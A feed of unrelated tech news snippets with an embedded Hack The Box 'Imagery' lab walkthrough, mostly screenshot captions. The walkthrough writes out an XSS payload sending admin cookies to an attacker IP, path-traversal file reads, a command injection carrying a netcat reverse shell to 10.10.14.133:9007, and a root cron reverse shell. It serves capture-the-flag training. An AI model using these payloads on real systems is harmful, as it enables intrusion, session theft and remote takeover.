I use Plex almost every day, and I’ve noticed several massive “improvements” over the last year. While I’m happy with most of the changes, one of my favorite features—and very underrated—was on the wrong end of them. Allow me to explain.
In what is one of the most important developments in the Chinese auto industry, Xiaomi’s SU7 has outsold Tesla’s Model 3 in 2025. The information comes from the China Passenger Car Association (via scmp.com). The Chinese smartphone maker delivered 258,164 units of its first EV. Meanwhile, Tesla sold only 200,361 Model 3s, marking the first […]
The post Tesla Model 3 got outsold by an EV from a Chinese smartphone brand appeared first on Digital Trends.
Running old CD-ROM games on modern Windows isn't too hard if you know how to manage Windows' compatibility software. But what if you have a Linux desktop and don't want to leave your old Windows games behind?
One of the biggest shows available to stream concluded in 2025, with a finale that sparked mixed reactions and criticism. But the reactions were not surprising, nor was the way the finale fell through.
It’s fair to say that there are many people in our community who just love to dunk on Microsoft Windows. It’s an easy win, after all, the dominant player in the PC operating system market has a long history of dunking on free software, and let’s face it, today’s Windows doesn’t offer a good experience. But what might the future hold? [Mason] has an unexpected prediction: that Microsoft will eventually move towards offering a Windows-themed Linux distro instead of a descendant of today’s Windows.
The very idea is sure to cause mirth, but on a little sober reflection, it’s not such a crazy one. Windows 11 is slow and unfriendly, and increasingly it’s losing the position once enjoyed by its ancestors. The desktop (or laptop) PC is no longer the default computing experience, and what to do about that must be a big headache for the Redmond company. Even gaming, once a stronghold for Windows, is being lost to competitors such as Valve’s Steam OS, so it wouldn’t be outlandish for them to wonder whether the old embrace-and-extend strategy could be tried on the Linux desktop.
We do not possess a working crystal ball here at Hackaday, so we’ll hold off hailing a Microsoft desktop Linux. But we have to admit it’s not an impossible future, having seen Apple reinvent their OS in the past using BSD, and even Microsoft bring out a cloud Linux distro. If you can’t wait, you’ll have to make do with a Windows skin, WINE, and the .NET runtime on your current Linux box.
Imagine an operating system that forgets everything you did once you shut down your computer. One that not only erases all traces of your activity, but also protects your privacy online. That's exactly what Tails is meant to be.
As a frequent user of HBO Max, I love how easy—effortless, really—it is to explore and discover all the content its library has to offer. One of my favorite features to dive into is the streamer’s unique Discover Our Collections category, which contains a heck of a lot more than just random collections of content. The service also offers a rabbit hole into entertaining experiences and insider information.
Read more of this story at Slashdot.
Want to take your Vim game to the next level? From my time using Vim, I've learned many neat tips and tricks that have saved me tons of time and headaches while editing with Vim. I'm sharing some of my top tips in this guide so you can incorporate them into your workflow.
Netflix pioneered the idea of streaming services making their own original content, exclusive to each platform. In general, this has worked well, and shows like Stranger Things have become major tentpole hits.
I used to treat my Linux app menu like a forgotten drawer. I rarely opened it, only to switch to my terminal a bit later. Then I found Ulauncher. It quietly replaced my start menu, app grid, and desktop shortcuts. Once I got used to it, I wondered why I ever clicked through menus in the first place.
The United Kingdom has selected seven defense companies to develop prototype uncrewed aircraft that will operate alongside Apache attack helicopters, advancing a British Army program aimed at integrating autonomous systems into frontline aviation operations. The UK Ministry of Defence confirmed that the companies were invited to the next stage of Project NYX, a program designed […] In this write-up, we will explore the “Imagery” machine from Hack The Box, categorised as a Medium difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.
The goal of this walkthrough is to complete the “Imagery” machine from Hack The Box by achieving the following objectives:
User Flag:
After gaining an initial foothold through weaknesses in the web application, access is gradually expanded beyond a standard user account. By leveraging exposed application data and mismanaged credentials, lateral movement becomes possible within the system. This progression ultimately leads to access to a regular system user account, where the user flag can be retrieved, marking the successful completion of the first objective.
Root Flag:
With user-level access established, further analysis reveals misconfigured privileges and trusted system utilities that can be abused. By carefully interacting with these elevated permissions and understanding how system-level automation is handled, full administrative control of the machine is achieved. This final escalation allows access to the root account and the retrieval of the root flag, completing the machine compromise.
Nmap Scan:
Begin with a network scan to identify open ports and running services on the target machine.
Loginnmap -sC -sV -oA initial 10.129.3.10Nmap Output:
┌─[dark@parrot]─[~/Documents/htb/imagery]
└──╼ $nmap -sC -sV -oA initial 10.129.3.10
# Nmap 7.94SVN scan initiated Fri Jan 23 23:04:24 2026 as: nmap -sC -sV -oA initial 10.129.3.10
Nmap scan report for 10.129.3.10
Host is up (0.22s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.7p1 Ubuntu 7ubuntu4.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 35:94:fb:70:36:1a:26:3c:a8:3c:5a:5a:e4:fb:8c:18 (ECDSA)
|_ 256 c2:52:7c:42:61:ce:97:9d:12:d5:01:1c:ba:68:0f:fa (ED25519)
8000/tcp open http-alt Werkzeug/3.1.3 Python/3.12.7
|_http-title: Image Gallery
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404 NOT FOUND
| Server: Werkzeug/3.1.3 Python/3.12.7
| Date: Sat, 24 Jan 2026 00:25:22 GMT
| Content-Type: text/html; charset=utf-8
| Content-Length: 207
| Connection: close
| <!doctype html>
| <html lang=en>
| <title>404 Not Found</title>
| <h1>Not Found</h1>
| <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>| GetRequest:
| HTTP/1.1 200 OK
| Server: Werkzeug/3.1.3 Python/3.12.7
| Date: Sat, 24 Jan 2026 00:25:15 GMT
| Content-Type: text/html; charset=utf-8
| Content-Length: 146960
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="UTF-8">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <title>Image Gallery</title>
| <script src="static/tailwind.js"></script>
| <link rel="stylesheet" href="static/fonts.css">
| <script src="static/purify.min.js"></script>
| <style>
| body {
| font-family: 'Inter', sans-serif;
| margin: 0;
| padding: 0;
| box-sizing: border-box;
| display: flex;
| flex-direction: column;
| min-height: 100vh;
| position: fixed;
| top: 0;
| width: 100%;
| z-index: 50;
|_ #app-con
|_http-server-header: Werkzeug/3.1.3 Python/3.12.7Analysis:
Web Application Exploration:
Features the app’s slogan “Capture & Cherish Every Moment” in large white text, followed by a description: “Your personal online gallery, designed for simplicity and beauty. Upload, organise, and relive your memories with ease.” Below that, a white section titled “Powerful Features at Your Fingertips” with three icons (a landscape image frame, a padlock for security, and a rocket for speed/performance). The navigation bar at the top includes “Home,” “Login,” and “Register.”
Centred white form on blue background titled “Register”. Fields: “Email ID” (placeholder: “Enter your email ID”) and “Password” (placeholder: “Enter your password” with eye icon for visibility). Blue “Register” button. ja
Fields pre-filled: “Email ID” as “dark@imagery.htb” and masked “Password”. Blue “Register” button.
Similar to register, titled “Login”. Fields pre-filled: “Email ID” as “dark@imagery.htb” and masked “Password”. Blue “Login” button, plus “Don’t have an account? Register here” link. Top nav: “Home”, “Login”, “Register”.
White background with title “Your Image Gallery”. A card message: “No images uploaded yet. Go to the ‘Upload’ page to add some!” Logged-in nav: “Home”, “Gallery”, “Upload”, “Logout” (red button).
Client-side JavaScript source code fetching and displaying admin bug reports from /admin/bug_reports with error handling and UI rendering logic.
JavaScript function handleDownloadUserLog redirects to /admin/get_system_log with a crafted log_identifier parameter based on username.
404 Not Found response when accessing the root /admin endpoint directly.
JSON access denied response (“Administrator privileges required”) when trying to access /admin/users as a non-admin user.
405 Method Not Allowed error on GET request to /report_bug, indicating the endpoint exists but requires a different HTTP method (likely POST).
App footer section showing copyright “© 2026 Imagery”, Quick Links (Home, Gallery, Upload, Report Bug), social media links, and contact info (support@imagery.com, fictional address).
“Report a Bug” form pre-filled with “bugName”: “dark” and the same XSS cookie-stealing payload in Bug Details, ready for submission.
Terminal session as user “dark@parrot” running a local HTTP server (sudo python3 -m http.server 80) in the ~/Documents/htb/imagery directory to serve files/listen for requests on port 80.
Burp Suite capture of a successful POST to /report_bug, submitting JSON with “bugName”: “dark” and XSS payload in “bugDetails” (<img src=x onerror=”document.location=’http://10.10.14.133:80/?cookie=’+document.cookie”>), response confirms submission with admin review message.
The response of successful POST to /report_bug, submitting an XSS payload in bugDetails to exfiltrate cookies via redirect to the attacker’s server.
Burp Suite capture of GET request to /auth_status returning JSON with logged-in user details (username “dark@imagery.htb“, isAdmin false).
Local Python HTTP server log showing incoming request from target (10.129.3.10) with stolen admin session cookie in query parameter, plus 404 for favicon.
Burp Suite capture of GET to /admin/ endpoint returning standard 404 Not Found HTML error page.
Successful GET to /admin/users with stolen admin cookie returning JSON user list (admin with isAdmin:true, testuser with isAdmin:false).
JavaScript source snippet of handleDownloadUserLog function redirecting to /admin/get_system_log with the encoded log_identifier parameter.
Failed LFI attempt on non-existent path returning 500 Internal Server Error with “Error reading file: 404 Not Found”.
Successful LFI exploitation via /admin/get_system_log retrieving /etc/passwd contents through path traversal payload “../../../../../../etc/passwd”.
Admin Panel interface (accessed with hijacked session) showing User Management with admin and testuser entries, plus empty Submitted Bug Reports section.
LFI retrieval of /proc/self/environ exposes environment variables (LANG, PATH, WEBHOME, WEBSHELL, etc.).
Retrieved db.json file contents via /admin/get_system_log path traversal, exposing user records with MD5-hashed passwords for admin and testuser, alongside an empty bug_reports array.
LFI retrieval of config.py source code exposing app constants like DATA_STORE_PATH=’db.json’, upload folders, and allowed extensions.
CrackStation online tool cracking the MD5 hash “2c65c8d7bfbca32a3ed42596192384f6” to plaintext “iambatman”.
Terminal output of failed SSH attempt as testuser@10.129.3.10 with publickey authentication denied.
Login page with Email ID pre-filled as “testuser@imagery.htb” and masked password field.
Empty Gallery page for logged-in user stating “No images uploaded yet. Go to the ‘Upload’ page to add some!”
Upload New Image form with “lips.png” selected (max 1MB, allowed formats listed), optional title/description, group “My Images”, uploading as Account ID e5f6g7h8.
Gallery view showing single uploaded image “lips” (red lips icon) with open context menu offering Edit Details, Convert Format, Transform Image, Delete Metadata, Download, and Delete.
Visual Image Transformation modal in crop mode with selectable box over the red lips image, parameters set to x:0 y:0 width:193 height:172.
Successful Burp POST to /apply_visual_transform with valid crop params returning new transformed image URL in /uploads/admin/transformed/.
Burp capture of POST to /apply_visual_transform with invalid crop “x”:”id” parameter resulting in 500 error (“invalid argument for option ‘-crop'”).
Burp capture of POST to /apply_visual_transform injecting “cat /etc/passwd” via crop “x” parameter, resulting in 500 error exposing command output snippet.
Attacker terminal running netcat listener on port 9007 (nc -lvnp 9007).
Burp capture of POST to /apply_visual_transform with reverse shell payload in crop “x” parameter (“rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.133 9007 >/tmp/f”).
Successful reverse shell connection from target (10.129.3.10) to attacker listener on port 9007, landing as web@Imagery.
Detailed directory listing of /web (app root) revealing source files (api_*.py, app.py, config.py, db.json, utils.py) and directories (bot, env, static, system_logs, templates, uploads).
Directory listing of /web/bot showing admin.py file owned by web user.
Source code of admin.py revealing Selenium automation bot with hardcoded admin credentials (“admin@imagery.htb“:”strongsandofbeach”), bypass token, and Chrome binary path.
Detailed directory listing of /var showing system directories (backup, backups, cache, crash, lib, local, log, mail, opt, run, snap, spool, tmp).
Directory listing of /var/backup showing an encrypted backup file web_20250806_120723.zip.aes.
Directory listing of /var/backups showing multiple compressed APT/dpkg state archives (.gz files).
Target starting Python HTTP server on port 9007 to serve the encrypted backup file.
Wget successfully downloading the encrypted backup file web_20250806_120723.zip.aes (22MB) from the target’s HTTP server on port 9007.
File command confirming web_20250806_120723.zip.aes is AES-encrypted data created by pyAesCrypt 6.1.1.
Attempt to run dpyAesCrypt.py failing with ModuleNotFoundError for ‘pyAesCrypt’ (case-sensitive import issue).
Successful pip3 user installation of pyaescrypt-6.1.1 package.
Failed execution of dpyAesCrypt.py due to ModuleNotFoundError for ‘termcolor’ (missing import dependency).
Successful pip3 user installation of termcolor-3.3.0 package.
Custom pyAesCrypt brute-forcer discovering password “bestfriends” early in the wordlist.
Successful decryption of the AES backup using “bestfriends”, outputting the original web_20250806_120723.zip.
The cunzip extracting the decrypted backup archive, revealing full app source (api_*.py, app.py, config.py, db.json, utils.py), templates, system_logs, env, and compiled pycache files.
cat of decrypted db.json revealing user database with admin (hashed password), testuser (“iambatman”), and mark (another hashed password).
CrackStation results cracking MD5 hashes to “iambatman”, “supersmash”, and “spiderweb1234” (one unknown).
Successful su to mark using password “supersmash”, confirming uid/gid 1002.
Python one-liner (python3 -c ‘import pty;pty.spawn(“/bin/bash”)’) to spawn an interactive bash shell.
ls -al in /home/mark showing files including user.txt (likely containing the flag).
We can read the user flag by typing the “cat user.txt” command
Privilege Escalation:
sudo -l reveals that user mark can run /usr/local/bin/charcol as root without a password (NOPASSWD).
charcol help output describing the CLI tool for encrypted backups, with commands (shell, help) and options (-quiet, -R for reset).
Failed charcol shell passphrase attempts (“bestfriend”, “supermash”, “supersmash”) resulting in lockout after multiple errors.
sudo charcol -R resetting application password to default (“no password” mode) after system password verification.
sudo charcol -R resetting application password to default (“no password” mode) after system password verification.
Repeated sudo charcol -R successfully resetting to no password mode.
charcol interactive shell entry after initial setup, displaying ASCII logo and info message.
charcol help output explaining backup/fetch commands and “auto add” for managing automated (root) cron jobs, with security warnings.
Attacker terminal running netcat listener on port 9007 in preparation for reverse shell.
Successful “auto add” command creating a root cron job with reverse shell payload to attacker (10.10.14.133:9007), verified with system password “supersmash”.
Successful privilege escalation to root via a malicious cron job triggered a reverse shell, followed by reading the root flag from /root/root.txt
The post Hack The Box: Imagery Machine Walkthrough – Medium Difficulity appeared first on Threatninja.net.
Major cryptocurrency exchanges are reportedly positioning to bring tokenized stock trading onto the blockchain, signaling a renewed push to merge traditional financial markets with digital assets.
According to a report published Friday by The Information, platforms such as Binance are exploring ways to offer crypto tokens that track publicly listed US companies, effectively creating new channels for equity exposure through tokenized instruments.
The report says Binance is considering reintroducing stock tokens to its platform, several years after pulling similar products in 2021 amid regulatory uncertainty.
The plan, cited by a person familiar with the matter, reflects a broader shift within the industry as exchanges revisit tokenized equities under evolving market and compliance frameworks.
OKX is also said to be evaluating the possibility of offering tokenized stocks, according to Haider Rafique, the company’s global managing partner and chief marketing officer.
Binance has framed the move as part of its long-term strategy to connect traditional finance with the crypto ecosystem. In a statement to CoinDesk, a Binance spokesperson said the exchange is focused on expanding user choice while maintaining strict regulatory standards.
The company noted that it began supporting tokenized real-world assets (RWAs) last year and recently launched what it described as the first regulated traditional finance perpetual contracts settled in stablecoins.
Exploring tokenized equities, the spokesperson said, is a natural progression as Binance continues to build infrastructure, collaborate with established financial institutions, and develop new products for users and the wider industry.
Binance and OKX are not alone in this effort. Several major crypto firms, including Robinhood (HOOD), Gemini (GEMI), and Kraken, have already rolled out tokenized stock offerings in Europe. Meanwhile, Robinhood and blockchain startup Dinari are seeking regulatory approval to introduce similar products in the United States.
Robinhood took a significant step in June of last year when it launched trading in tokens linked to publicly listed companies and announced plans to expand into tokenized shares of private firms.
As part of the rollout, the company distributed tokens pegged to OpenAI. According to Robinhood’s terms and conditions, those tokens function as derivative contracts backed by the firm’s ownership of fund units in a special-purpose vehicle that holds OpenAI convertible notes.
Coinbase (COIN), on the other hand, is reportedly in discussions with the US Securities and Exchange Commission (SEC) about launching tokenized securities that would grant investors the same legal rights and benefits as conventional shares.
Several issuers involved in the space say they are closely adhering to established rules around securities law, anti-money laundering requirements, bankruptcy protections, and investor safeguards.
Industry leaders argue that, when structured properly, tokenization can strengthen rather than weaken investor protections. Ian De Bode, chief strategy officer at Ondo Finance, said that a careful approach to tokenized securities can enhance safeguards while unlocking efficiencies that traditional markets struggle to achieve.
Featured image from OpenArt, chart from TradingView.com
The Servo project developers have announced the release of version 0.0.4 of its Servo browser engine, bringing with it some crucial upgrades in the long-term goal of supporting a full browser experience.
For years, cybersecurity strategy revolved around a simple goal: keep attackers out. That mindset no longer matches reality. Today’s threat landscape assumes compromise. Adversaries do not just encrypt data and demand payment. They exfiltrate it, resell it, reuse it, and weaponize it long after the initial breach. As we look toward 2026, cyber resilience, not..
The post The New Rules of Cyber Resilience in an AI-Driven Threat Landscape appeared first on Security Boulevard.
